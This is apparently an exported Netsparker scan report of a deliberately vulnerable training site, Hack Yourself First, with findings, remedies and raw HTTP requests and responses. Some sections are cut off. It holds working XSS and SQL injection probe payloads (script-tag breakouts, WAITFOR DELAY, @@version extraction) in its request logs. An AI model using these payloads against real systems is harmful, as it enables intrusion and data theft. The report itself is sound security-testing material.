</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT | 1 TOTAL | 1 CONFIRMED
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library, OWASP XSS Prevention Cheat Sheet, OWASP AntiSamy Java
External References: XSS Cheat Sheet, OWASP - Cross-site Scripting, XSS Shell, XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT | 1 TOTAL | 1 CONFIRMED
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/SupercarLeaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT | 1 TOTAL | 1 CONFIRMED
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact
This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property, How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT | 1 TOTAL
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI v2.0-6.1, PCI v3.0-6.1, CAPEC-310
7.1 /Make/1 http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty:
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
@media screen and (max-width: 639px) {
 pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
}
@media screen and (max-width: 479px) {
 pre { width: 280px; }
}
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM | 1 TOTAL | 1 CONFIRMED
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
3 TOTAL (MEDIUM)
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto MIME sniffing such as Internet Explorer.
Certainty
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>').\r\nIncorrect syntax near '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>').","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter  Type  Value
nsextt     GET   "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto MIME sniffing such as Internet Explorer.
Certainty
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Request:
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.2 /Supercar/Leaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-
Parameters:
Parameter  Type  Value
orderBy    GET   1 WAITFOR DELAY '0:0:25'--
asc        GET   false
Request:
